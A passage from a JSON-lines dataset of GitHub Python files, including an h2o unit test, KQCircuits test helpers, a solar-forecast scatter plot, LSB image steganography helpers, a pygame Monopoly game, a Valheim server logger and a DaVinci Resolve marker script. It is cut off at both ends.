sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\n\n\ndef test_relevel_by_freq_topn():\n prostate_cat = h2o.import_file(path=pyunit_utils.locate(\"smalldata/prostate/prostate_cat.csv\"))\n\n dpros_levels_ordered = prostate_cat[\"DPROS\"].table().as_data_frame()[\"DPROS\"].tolist()\n assert dpros_levels_ordered == [\"Both\", \"Left\", \"None\", \"Right\"]\n\n prostate_cat_relevel = prostate_cat.relevel_by_frequency(top_n=1)\n\n dpros_relevel_levels = prostate_cat_relevel[\"DPROS\"].table().as_data_frame()[\"DPROS\"].tolist()\n assert dpros_relevel_levels == ['Left', 'Both', 'None', 'Right']\n\n top_drops_level = prostate_cat[\"DPROS\"].table().as_data_frame().sort_values(by=\"Count\")[\"DPROS\"].tolist()[-1]\n prostate_cat_relevel_manual = prostate_cat[\"DPROS\"].relevel(y=top_drops_level)\n assert prostate_cat_relevel_manual.levels() == [dpros_relevel_levels] \n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_relevel_by_freq_topn)\nelse:\n test_relevel_by_freq_topn()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_misc/pyunit_relevel_by_freq_topn.py","file_name":"pyunit_relevel_by_freq_topn.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"7606207992","text":"from kqcircuits.pya_resolver import pya\n\n\"\"\"\n Module containing base unit tests to be used by all chips.\n\n The functions in this module are not pytest unit tests by themselves, but must be called by test functions in the\n modules for individual chip tests.\n\n Typical usage example:\n\n from tests.chips.chip_base_tests import errors_test, box_existence_test\n from kqcircuits.chips.single_xmons import SingleXmons\n\n def test_errors(capfd):\n errors_test(capfd, SingleXmons)\n\n def test_box_existence():\n box_existence_test(SingleXmons)\n\n\"\"\"\n\n\ndef errors_test(capfd, cls):\n \"\"\"Test if exceptions happen during creation of an element.\n\n When an element is created using create(), it calls the element's produce_impl(). Exceptions\n happening in produce_impl() are caught by KLayout and output to stderr. Thus we can't detect the exceptions\n directly, but we can check stderr for errors. NOTE: This assumes that there are no unrelated errors output to stderr\n by klayout. This may also not catch every possible error.\n \"\"\"\n layout = pya.Layout()\n cell = cls.create(layout)\n out, err = capfd.readouterr()\n assert err == \"\", err\n\n\ndef box_existence_test(cls):\n layout = pya.Layout()\n cell = cls.create(layout)\n parameters = cell.pcell_parameters_by_name()\n assert type(parameters[\"box\"]) is pya.DBox\n","repo_name":"iqm-finland/KQCircuits","sub_path":"tests/chips/chip_test_helpers.py","file_name":"chip_test_helpers.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"61"} +{"seq_id":"38040650041","text":"binary = int(input(\"Binært tall: \"))\n\n\nbinAsStr = str(binary)\nbinLen = len(binAsStr) - 1 #-1 pga vil ha med at siste teikn er potens 0 og ikke 1\n\nbuffer = 0\n\nfor i in binAsStr:\n if i == \"1\":\n buffer += 2**binLen\n\n binLen -= 1\n\nprint(buffer)","repo_name":"gronnmann/INF100","sub_path":"uke4/uke_04_oppg_11.py","file_name":"uke_04_oppg_11.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28535225755","text":"\"\"\"\nPlot true vs prediction to visualise where the errors occur\n\"\"\"\n# Standard Library Modules\nfrom pathlib import Path\nfrom datetime import datetime\nimport math\n\n# External Modules\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sklearn.metrics as metrics\n\n\ndef scatter_inner(ax, df, actual, model, ax_title):\n ax.scatter(df[actual], df[model], 1)\n minval = df[[actual, model]].min().min()\n maxval = df[[actual, model]].max().max()\n ax.plot([minval, maxval], [minval, maxval], ls=\"--\", color=\"black\")\n ax.set_xlabel('Actual GHI (W/m2)')\n ax.set_ylabel('Forecast GHI (W/m2)')\n rmse = math.sqrt(metrics.mean_squared_error(df[actual], df[model]))\n ax.set_title(f\"{ax_title} RMSE = {rmse:.2f}\")\n return ax\n\n\ndef scatter_error(df, actual, model, ax_title=\"\", fig_title=\"\", filebase=\"plot\", output_path=Path(\"\")):\n fig, ax = plt.subplots()\n fig.set_size_inches(8, 8)\n ax = scatter_inner(ax, df, actual, model, ax_title)\n fig.suptitle(fig_title)\n fig.savefig(output_path)\n plt.close(fig)\n\ndef scatter_error_quad(df_list, actual, model, ax_title_list=[\"\"], fig_title=\"\", filebase=\"plot\", output_path=Path(\"\")):\n fig, ((ax0, ax1), (ax2, ax3)) = plt.subplots(nrows=2, ncols=2)\n fig.set_size_inches(11, 11)\n ax0 = scatter_inner(ax0, df_list[0], actual, model, ax_title_list[0])\n ax1 = scatter_inner(ax1, df_list[1], actual, model, ax_title_list[1])\n ax2 = scatter_inner(ax2, df_list[2], actual, model, ax_title_list[2])\n ax3 = scatter_inner(ax3, df_list[3], actual, model, ax_title_list[3])\n fig.suptitle(fig_title)\n fig.savefig(output_path)\n plt.close(fig)\n\ndef read_parquet(path):\n df = pd.read_parquet(path)\n df[\"datetime\"] = pd.to_datetime(df[\"predicted-time\"], format=\"%Y-%m-%d_%H-%M-%S\")\n df = df.set_index(\"datetime\")\n df = df.sort_index()\n return df\n\ndef plot1():\n df = read_parquet(\"/results/CaseStudies/scatter/All/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\")\n df = df.dropna()\n scatter_error(\n df,\n actual=\"actual\",\n model=\"fully-conv_2x60s_120s_run_03_fold_4\",\n ax_title=\"\",\n fig_title=f\"Actual vs Forecast GHI. Category: All\",\n output_path=\"/results/CaseStudies/scatter/scatter-all.pdf\")\n\ndef plot_quad1():\n df_list = [\n read_parquet(\"/results/CaseStudies/scatter/All/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n read_parquet(\"/results/CaseStudies/scatter/Intermittent/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n read_parquet(\"/results/CaseStudies/scatter/Overcast/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n read_parquet(\"/results/CaseStudies/scatter/Sunny/blackmountain_fully-conv_2x60s_120s_run_03_crop_1024_lr_3.0E-6_fold_4_metrics.parquet\").dropna(),\n ]\n scatter_error_quad(\n df_list,\n actual=\"actual\",\n model=\"fully-conv_2x60s_120s_run_03_fold_4\",\n ax_title_list=[\"All\", \"Intermittent\", \"Overcast\", \"Sunny\"],\n fig_title=f\"Solpred model, 2 inputs 60 seconds apart, 2 minute forecast horizon\\nActual vs Forecast GHI by category\",\n output_path=\"/results/CaseStudies/scatter/scatter-quad.png\")\n\n\n\ndef main():\n plot1()\n plot_quad1()\n\n\nif __name__ == '__main__':\n main()","repo_name":"wongjoel/Solpred","sub_path":"src/plotting/scatter-plot.py","file_name":"scatter-plot.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"439133393","text":"from PIL import Image, ImageDraw\nimport random\nfrom stego.container import Container\n\ndef flip(i, j):\n\t#реализует lsb matching\n\tif j == 1:\n\t\tif i == 0:\n\t\t\treturn 1\n\t\telif i == 255:\n\t\t\treturn -1\n\t\telse: \n\t\t\treturn (1-2*(random.getrandbits(1)))\n\telse: \n\t\treturn 0\n\ndef get_lsb(pix):\n\t#возвращзает младшие биты пикселя\n\treturn [i&1 for i in pix]\n\ndef set_new_lsb(pix, lsb):\n\t#возвращает новые цветовые компоненты пикселя такие, чтобы младшие биты были равны lsb\n\ttemp = [i^j for i, j in zip(get_lsb(pix), lsb)]\n\ttemp+=[0]*(3 - len(temp))\n\treturn [(i+flip(i, j)) for i, j in zip(pix, temp)]\n\n\ndef image_to_bin_list(img, n):\n\t#возвращает вектор из младших битов пикселей изображения длины n, если это возможно\n\tobj = img.load()\n\tcontainer = []\n\tsize = min(n, img.size[0]*img.size[1]*3)\n\tlength = min(n//3+n%3-(n%3)//2, img.size[0]*img.size[1])\n\tfor i in range(length):\n\t\tcontainer.extend(get_lsb(obj[i%img.size[0], i//img.size[0]]))\n\treturn container\n\ndef emb_in_image(img, container, filename_new_image):\n\t#изменяет младшие биты в изображении так, чтобы вложить сообщение\n\tlength = min(len(container)//3+len(container)%3-(len(container)%3)//2, img.size[0]*img.size[1])\n\tobj = img.load()\n\tfor i in range(length):\n\t\tobj[i%img.size[0], i//img.size[0]]= tuple(set_new_lsb(obj[i%img.size[0], i//img.size[0]], container[i*3:(i+1)*3+len(container)%3]))\n\tprint(filename_new_image)\n\timg.save(filename_new_image)\n\t\n","repo_name":"olegkhachumov/Stego","sub_path":"stego/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7363599517","text":"import random\nimport special_cells\nimport pygame\nimport sys\n\n\nLENGHT = 1000\nHEIGHT = 575\n\npygame.init()\nscreen = pygame.display.set_mode((LENGHT, HEIGHT))\nscreen.fill((100, 150, 200))\n\nproperty_list = {'start': [-1], 'мотель' : [4000, None, 0, 4], 'турбаза' : [4000, None, 0, 4], 'шанс1' : [-1], 'гостинница' : [4000, None, 0, 4], 'северный порт' : [4000, None, 0, 1], \n 'аудиосалон' : [4000, None, 0, 5], 'лотерея1' : [-1], 'видеосалон' : [4000, None, 0, 5], 'TV-магазин' : [4000, None, 0, 5], 'отделение полиции' : [-1],\n 'салон связи': [4000, None, 0, 6], 'налоги1' : [-1], 'салон игр' : [4000, None, 0, 6], 'компьютеры и оргтехника' : [4000, None, 0, 6], 'восточный порт': [4000, None, 0, 1], \n 'спортзал' : [4000, None, 0, 7], 'водоснажебние' : [4000, None, 0, 3], 'бассейн' : [4000, None, 0, 7], 'гольфклуб' : [4000, None, 0, 7], 'стадион' : [-1], 'магазин мототехники': [4000, None, 0, 8],\n 'автосалон' : [4000, None, 0, 8], 'шанс' : [-1], 'салон спец-автотехника' : [4000, None, 0, 8], 'южный порт': [4000, None, 0, 1], \n 'автотранс' : [4000, None, 0, 9], 'лотерея' : [-1], 'железная дорога' : [4000, None, 0, 9], 'авиакомпания' : [4000, None, 0, 9], \n 'пустая клетка' : [-1], 'пресса' : [4000, None, 0, 0], 'колл-центр' : [3800, None, 0, 0], 'налоги' : [-1], 'книжный магазин' : [4400, None, 0, 0],\n 'западный порт' : [4000, None, 0, 1], 'закусочная' : [4000, None, 0, 2], 'электричество' : [4000, None, 0, 3], 'bar' : [4000, None, 0, 2], 'кафе': [4000, None, 0, 2]}\n\ncells_count = len(property_list)\n\nsphere_code = 10\n\nclass Interface:\n def __init__(self, players_list):\n self.players_list = players_list\n self.surface_info = pygame.Surface((LENGHT - HEIGHT, 300))\n self.surface_step = pygame.Surface((LENGHT - HEIGHT, 150))\n self.rect_step = self.surface_step.get_rect(topleft=(HEIGHT, 300))\n self.rect_info = self.surface_info.get_rect(topleft=(HEIGHT, 0))\n self.font = pygame.font.SysFont('arial', 15)\n\n def render_text(self, str_, surface, cords=(0,0)):\n text = self.font.render(str_, True, (0, 0, 0))\n text_rect = text.get_rect(topleft=cords)\n surface.blit(text, text_rect)\n\n def render_properties(self, x=0, player_number=0):\n for j in range(len(self.players_list[player_number].properties)):\n self.render_text(str(self.players_list[player_number].properties[j][0]), self.surface_info, (x, 60 + 20 * j))\n\n def render_plyer_info(self, player_number, cords):\n x, y = cords\n self.render_text(self.players_list[player_number].name, self.surface_info, (x, y))\n self.render_text(str(self.players_list[player_number].money), self.surface_info, (x, y + 20))\n self.render_text(str(self.players_list[player_number].cell), self.surface_info, (x, y + 40))\n self.render_properties(x, player_number)\n\n def rendering(self):\n self.surface_info.fill((100, 150, 200))\n self.surface_step.fill((100, 150, 200))\n self.render_plyer_info(0, (0, 0))\n self.render_plyer_info(1, (200, 0))\n screen.blit(self.surface_info, self.rect_info)\n screen.blit(self.surface_step, self.rect_step)\n\n\n def step(self, player):\n self.surface_step.fill((100, 150, 200))\n text_1 = f'имя игрока: {player.name}'\n text_2 = f'номер клетки: {player.cell}'\n property_name = list(property_list)[player.cell]\n text_3 = f'клетка: {property_name}'\n text_4 = '1 - купить, 0 - отказаться'\n\n self.render_text(text_1, self.surface_step, (20, 40))\n self.render_text(text_2, self.surface_step, (20, 60))\n self.render_text(text_3, self.surface_step, (20, 80))\n self.render_text(text_4, self.surface_step, (20, 100))\n\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def transfer_print(self, player_from, player_to, sum):\n self.surface_step.fill((100, 150, 200))\n\n text = f'{player_from} дал {player_to} {sum}$'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n print(text)\n\n def forfeit(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} заплатил налоги' \n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def skip(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} попал в обезьянник за пьяный дебош, пропуск хода'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n \n def chance(self, plyaer):\n text = f'{plyaer.name} получается шанс получить 1000 денег'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def lotery(self, plyaer):\n text = f'{plyaer.name} крутит рулетку...'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n \n pygame.display.update()\n\n def surcharge(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} подрался с работником налоговой и подвергся'\n text_2 = 'дополнительному налогооблажению'\n self.render_text(text, self.surface_step, (20, 60))\n self.render_text(text_2, self.surface_step, (20, 80))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n \n def start_position(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} закончил ход!!!' \n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def purchased_cell(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'эта клетка уже куплена игроком {player.name}' \n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n\nclass Player:\n def __init__(self, name):\n self.name = name\n self.money = 15000\n self.cell = 0\n self.cell_plus_1 = random.randint(1, 6)\n self.cell_plus_2 = random.randint(1, 6)\n self.skip = False\n self.properties = []\n\n def roll(self):\n self.cell_plus_1 = random.randint(1, 6)\n self.cell_plus_2 = random.randint(1, 6)\n\n def dice_roll(self):\n self.roll()\n self.cell = (self.cell + self.cell_plus_1 + self.cell_plus_2)\n if self.cell >= cells_count:\n self.money += 1000\n print(f'{self.name} вернулся на стартовую позицию и получил 1000!')\n self.cell %= cells_count\n\n def cost_for_another_players(self):\n temp_count = [0 for i in range(sphere_code)]\n for prop in self.properties:\n temp_count[prop[1]] += 1\n \n for i in range(len(temp_count)):\n coef = 1\n\n if temp_count[i] == 2:\n coef = 1.2\n if temp_count[i] >= 3:\n coef = 1.4\n\n for j in self.properties:\n if j[1] == i:\n property_list[j[0]][2] = property_list[j[0]][0] // 10 * coef\n\n def transef_of_money(self, player_2, sum):\n self.money -= sum\n player_2.money += sum\n\n def read_choice(self):\n while True:\n for i in pygame.event.get():\n if i.type == pygame.QUIT:\n sys.exit()\n\n elif i.type == pygame.KEYDOWN:\n if i.key == pygame.K_1:\n return 1\n if i.key == pygame.K_0:\n return 0\n\n def in_cell(self, choice):\n property_name = list(property_list)[self.cell]\n property_price = property_list[property_name][0]\n owner = property_list[property_name][1]\n \n # cost_for_stand = property_list[property_name][2]\n # if owner != self.name and owner != None and cost_for_stand > 0:\n # return owner, cost_for_stand\n\n # choice = self.read_choice()\n\n\n if choice and self.money > property_price and owner == None:\n property_list[property_name][1] = self.name\n property_list[property_name][2] = property_price // 10\n self.properties.append([property_name, property_list[property_name][3]])\n self.money -= property_price\n self.cost_for_another_players()\n \n #return None, 0\n \n\n def __str__(self):\n return self.name + ' ' + str(self.money) + ' ' + str(self.cell)\n\n\nclass Game:\n def __init__(self, players_count=2):\n self.players_count = players_count\n self.players = []\n self.player_number = 0\n self.players_create()\n self.interface = Interface(self.players)\n\n def players_create(self):\n for i in range(self.players_count):\n name = input(f'Input {i + 1} player name: ')\n player = Player(name)\n self.players.append(player)\n\n def transaction(self, player_to, player_from, sum_):\n player_to.money += sum_\n player_from.money -= sum_\n\n def give_player_obj_from_name(self, name):\n for i in self.players:\n if i.name == name:\n return i\n\n def move(self):\n active_player = self.players[self.player_number]\n if not active_player.skip:\n property_name = list(property_list)[active_player.cell]\n if len(property_list[property_name]) == 1:\n if property_name in ['налоги', 'налоги1']:\n r = random.randint(1, 2)\n if r == 1:\n special_cells.forfeit(active_player)\n self.interface.forfeit(active_player)\n else:\n special_cells.surcharge(active_player)\n self.interface.surcharge(active_player)\n elif property_name == 'отделение полиции':\n special_cells.skip(active_player)\n self.interface.skip(active_player)\n elif property_name in ['лотерея', 'лотерея1']:\n special_cells.lotery(active_player)\n self.interface.lotery(active_player)\n elif property_name in ['шанс', 'шанс1']:\n special_cells.chance(active_player)\n self.interface.chance(active_player)\n else:\n property_name = list(property_list)[active_player.cell]\n property_price = property_list[property_name][0]\n owner = property_list[property_name][1]\n \n cost_for_stand = property_list[property_name][2]\n player_to = self.give_player_obj_from_name(owner)\n if owner != active_player.name and player_to != None:\n # owner, cost_for_stand\n # if player_to_name != None and sum != 0: \n self.transaction(player_to, active_player, cost_for_stand)\n self.interface.transfer_print(active_player.name, owner, cost_for_stand)\n elif owner == active_player.name:\n self.interface.purchased_cell(active_player)\n else:\n self.interface.step(active_player)\n choice = active_player.read_choice()\n \n active_player.in_cell(choice)\n \n self.player_number = (self.player_number + 1) % self.players_count\n\n else:\n print('отдохни и пропусти ход')\n active_player.skip = False\n\n def active(self):\n for player in self.players:\n if player.money < 0:\n return False\n\n return True\n\n\nclass Image():\n def __init__(self, path):\n self.surf = pygame.image.load(path)\n self.rect = self.surf.get_rect()\n\n def resize(self, field_pieces=1):\n self.surf = pygame.transform.scale(self.surf, (self.surf.get_width() // field_pieces, self.surf.get_height() // field_pieces))\n self.rect = self.surf.get_rect()\n\n def rendering(self, x=0, y=0, center=None):\n if center:\n self.rect.centerx = x\n self.rect.centery = y\n else:\n self.rect.x = x\n self.rect.y = y\n screen.blit(self.surf, self.rect)\n \n\nfield = Image('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\\\table.bmp')\nfield.rendering()\n\ncube_1 = Image('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\die1.jpg')\ncube_2 = Image('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\die2.jpg')\ncube_1.resize(8)\ncube_2.resize(8)\ncube_1.rendering(600, 475)\ncube_2.rendering(700, 475)\n\ncubes = []\nfor i in range(1, 7):\n cube = Image(f'D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\die{i}.jpg')\n cube.resize(8)\n cubes.append(cube)\n\nfield_pieces = HEIGHT / 15\nicons = []\ndef append_player_icon(path):\n icon = Image(path)\n icon.resize(10)\n icon.rendering(field_pieces * 1.5, field_pieces * 1.5, True)\n icons.append(icon)\n\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\hat.png')\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\car.png')\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\iron.png')\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\ship.png')\n\npygame.display.update()\nplayer_numbers = 2\ngame = Game()\nk = 1\nwhile game.active():\n if k:\n print('Press space for make move')\n k = 0\n\n for i in pygame.event.get():\n if i.type == pygame.QUIT:\n sys.exit()\n\n elif i.type == pygame.KEYDOWN:\n if i.key == pygame.K_SPACE:\n k = 1\n active_player = game.players[game.player_number]\n print('active player: ', active_player)\n if not active_player.skip:\n active_player.dice_roll()\n game.interface.rendering()\n cube_1 = cubes[active_player.cell_plus_1 - 1]\n cube_2 = cubes[active_player.cell_plus_2 - 1]\n cube_1.rendering(700, 475)\n cube_2.rendering(600, 475)\n icon = icons[game.player_number]\n\n field.rendering()\n for i in range(player_numbers):\n if i != game.player_number:\n icons[i].rendering(icons[i].rect.x, icons[i].rect.y)\n\n #изменять в условия только координаты\n if active_player.cell // 10 == 0:\n icon.rendering(field_pieces * 3.5 + field_pieces * (active_player.cell - 1), field_pieces * 1.5, True) \n elif active_player.cell // 10 == 1:\n icon.rendering(LENGHT - 425 - field_pieces * 1.5, HEIGHT - field_pieces * 3.5 - field_pieces * (9 - active_player.cell % 10), True)\n elif active_player.cell // 10 == 2:\n icon.rendering(HEIGHT - field_pieces * 3.5 - field_pieces * (active_player.cell % 10 - 1), HEIGHT - field_pieces * 1.5, True)\n elif active_player.cell // 10 == 3:\n icon.rendering(field_pieces * 1.5, HEIGHT - 3.5 * field_pieces - field_pieces * (active_player.cell % 10 - 1), True)\n\n pygame.display.update()\n\n print(active_player.cell)\n print(active_player.cell_plus_1)\n print(active_player.cell_plus_2)\n game.move()\n\n\n\n pygame.display.flip()","repo_name":"reeegry/monopoly","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9357521607","text":"from datetime import datetime\r\nimport time, os, re\r\nimport csv, asyncio\r\nfrom valve.source.a2s import ServerQuerier, NoResponseError\r\nimport config\r\n\r\npdeath = '.*?Got character ZDOID from (\\w+) : 0:0'\r\nlog = config.file\r\n\r\nasync def timenow():\r\n now = datetime.now()\r\n gettime = now.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n return gettime\r\n\r\nasync def writecsv():\r\n while True: \r\n try:\r\n with ServerQuerier(config.SERVER_ADDRESS) as server:\r\n with open('csv/playerstats.csv', 'a', newline='') as f:\r\n csvup = csv.writer(f, delimiter=',') \r\n curtime, players = await timenow(), server.info()['player_count']\r\n csvup.writerow([curtime, players])\r\n print(curtime, players)\r\n except NoResponseError:\r\n with open('csv/playerstats.csv', 'a', newline='') as f:\r\n csvup = csv.writer(f, delimiter=',') \r\n curtime, players = await timenow(), '0'\r\n csvup.writerow([curtime, players])\r\n print(curtime, 'Cannot connect to server')\r\n await asyncio.sleep(60)\r\n\r\nasync def deathcount():\r\n while True: \r\n with open(log, encoding='utf-8', mode='r') as f:\r\n f.seek(0,2)\r\n while True:\r\n line = f.readline()\r\n if(re.search(pdeath, line)):\r\n pname = re.search(pdeath, line).group(1)\r\n with open('csv/deathlog.csv', 'a', newline='', encoding='utf-8') as dl:\r\n curtime = await timenow()\r\n deathup = csv.writer(dl, delimiter=',')\r\n deathup.writerow([curtime, pname])\r\n print(curtime, pname, ' has died!')\r\n await asyncio.sleep(0.2)\r\n\r\nloop = asyncio.get_event_loop()\r\nloop.create_task(deathcount())\r\nloop.create_task(writecsv())\r\nloop.run_forever()\r\n","repo_name":"ckbaudio/valheim-discord-bot","sub_path":"code/_logsubprocess.py","file_name":"_logsubprocess.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"61"} +{"seq_id":"40669040902","text":"# Zachary Korpi, Jimmy Qiu\nimport os\nimport re\nimport sys\nimport math\nimport time\n\ndef GetResolve():\n try:\n # The PYTHONPATH needs to be set correctly for this import statement to work.\n # An alternative is to import the DaVinciResolveScript by specifying absolute path (see ExceptionHandler logic)\n import DaVinciResolveScript as bmd\n except ImportError:\n if sys.platform.startswith(\"darwin\"):\n expectedPath=\"/Library/Application Support/Blackmagic Design/DaVinci Resolve/Developer/Scripting/Modules/\"\n elif sys.platform.startswith(\"win\") or sys.platform.startswith(\"cygwin\"):\n import os\n expectedPath=os.getenv('PROGRAMDATA') + \"\\\\Blackmagic Design\\\\DaVinci Resolve\\\\Support\\\\Developer\\\\Scripting\\\\Modules\\\\\"\n elif sys.platform.startswith(\"linux\"):\n expectedPath=\"/opt/resolve/Developer/Scripting/Modules/\"\n\n # check if the default path has it...\n print(\"Unable to find module DaVinciResolveScript from $PYTHONPATH - trying default locations\")\n try:\n import imp\n bmd = imp.load_source('DaVinciResolveScript', expectedPath+\"DaVinciResolveScript.py\")\n except ImportError:\n # No fallbacks ... report error:\n print(\"Unable to find module DaVinciResolveScript - please ensure that the module DaVinciResolveScript is discoverable by python\")\n print(\"For a default DaVinci Resolve installation, the module is expected to be located in: \"+expectedPath)\n sys.exit()\n\n return bmd.scriptapp(\"Resolve\")\n\nresolve = GetResolve()\nfu = bmd.scriptapp('Fusion')\nui = app.UIManager\ndisp = bmd.UIDispatcher(ui)\npm = resolve.GetProjectManager()\nproj = pm.GetCurrentProject()\ntl = proj.GetCurrentTimeline()\nmarker_color = ['All','Blue','Cyan','Green','Yellow','Red','Pink','Purple','Fuchsia','Rose','Lavender','Sky','Mint','Lemon','Sand','Cocoa','Cream']\nrefresher = '1'\nframerate = 24\n\ndef getresolve(app='Resolve'):\n dr = bmd.scriptapp(app)\n return dr\n\ndef _exit(ev):\n disp.ExitLoop()\n\ndef this_timeline():\n return proj.GetCurrentTimeline()\n\ndef read_all_marker():\n mks = this_timeline().GetMarkers()\n print(mks)\n return mks\n\ndef read_timeline_startTC():\n tc = this_timeline().GetStartFrame()\n print(tc)\n return tc\n\ndef merge_two_dicts(x, y):\n z =x.copy()\n z.update(y)\n return z\n\ndef frames_to_timecode(total_frames, frame_rate, drop): ##credits to Manne Ohrstrom and Shotgun Software Inc.\n \"\"\"\n Method that converts frames to SMPTE timecode.\n \n :param total_frames: Number of frames\n :param frame_rate: frames per second\n :param drop: true if time code should drop frames, false if not\n :returns: SMPTE timecode as string, e.g. '01:02:12:32' or '01:02:12;32'\n \"\"\"\n if drop and frame_rate not in [29.97, 59.94]:\n raise NotImplementedError(\"Time code calculation logic only supports drop frame \"\n \"calculations for 29.97 and 59.94 fps.\")\n\n # for a good discussion around time codes and sample code, see\n # http://andrewduncan.net/timecodes/\n\n # round fps to the nearest integer\n # note that for frame rates such as 29.97 or 59.94,\n # we treat them as 30 and 60 when converting to time code\n # then, in some cases we 'compensate' by adding 'drop frames',\n # e.g. jump in the time code at certain points to make sure that\n # the time code calculations are roughly right.\n #\n # for a good explanation, see\n # https://documentation.apple.com/en/finalcutpro/usermanual/index.html#chapter=D%26section=6\n fps_int = int(round(frame_rate))\n\n if drop:\n # drop-frame-mode\n # add two 'fake' frames every minute but not every 10 minutes\n #\n # example at the one minute mark:\n #\n # frame: 1795 non-drop: 00:00:59:25 drop: 00:00:59;25\n # frame: 1796 non-drop: 00:00:59:26 drop: 00:00:59;26\n # frame: 1797 non-drop: 00:00:59:27 drop: 00:00:59;27\n # frame: 1798 non-drop: 00:00:59:28 drop: 00:00:59;28\n # frame: 1799 non-drop: 00:00:59:29 drop: 00:00:59;29\n # frame: 1800 non-drop: 00:01:00:00 drop: 00:01:00;02\n # frame: 1801 non-drop: 00:01:00:01 drop: 00:01:00;03\n # frame: 1802 non-drop: 00:01:00:02 drop: 00:01:00;04\n # frame: 1803 non-drop: 00:01:00:03 drop: 00:01:00;05\n # frame: 1804 non-drop: 00:01:00:04 drop: 00:01:00;06\n # frame: 1805 non-drop: 00:01:00:05 drop: 00:01:00;07\n #\n # example at the ten minute mark:\n #\n # frame: 17977 non-drop: 00:09:59:07 drop: 00:09:59;25\n # frame: 17978 non-drop: 00:09:59:08 drop: 00:09:59;26\n # frame: 17979 non-drop: 00:09:59:09 drop: 00:09:59;27\n # frame: 17980 non-drop: 00:09:59:10 drop: 00:09:59;28\n # frame: 17981 non-drop: 00:09:59:11 drop: 00:09:59;29\n # frame: 17982 non-drop: 00:09:59:12 drop: 00:10:00;00\n # frame: 17983 non-drop: 00:09:59:13 drop: 00:10:00;01\n # frame: 17984 non-drop: 00:09:59:14 drop: 00:10:00;02\n # frame: 17985 non-drop: 00:09:59:15 drop: 00:10:00;03\n # frame: 17986 non-drop: 00:09:59:16 drop: 00:10:00;04\n # frame: 17987 non-drop: 00:09:59:17 drop: 00:10:00;05\n\n # calculate number of drop frames for a 29.97 std NTSC\n # workflow. Here there are 30*60 = 1800 frames in one\n # minute\n\n FRAMES_IN_ONE_MINUTE = 1800 - 2\n\n FRAMES_IN_TEN_MINUTES = (FRAMES_IN_ONE_MINUTE * 10) - 2\n\n ten_minute_chunks = total_frames / FRAMES_IN_TEN_MINUTES\n one_minute_chunks = total_frames % FRAMES_IN_TEN_MINUTES\n\n ten_minute_part = 18 * ten_minute_chunks\n one_minute_part = 2 * ((one_minute_chunks - 2) / FRAMES_IN_ONE_MINUTE)\n\n if one_minute_part < 0:\n one_minute_part = 0\n\n # add extra frames\n total_frames += ten_minute_part + one_minute_part\n\n # for 60 fps drop frame calculations, we add twice the number of frames\n if fps_int == 60:\n total_frames = total_frames * 2\n\n # time codes are on the form 12:12:12;12\n smpte_token = \";\"\n\n else:\n # time codes are on the form 12:12:12:12\n smpte_token = \":\"\n\n # now split our frames into time code\n hours = int(total_frames / (3600 * fps_int))\n minutes = int(total_frames / (60 * fps_int) % 60)\n seconds = int(total_frames / fps_int % 60)\n frames = int(total_frames % 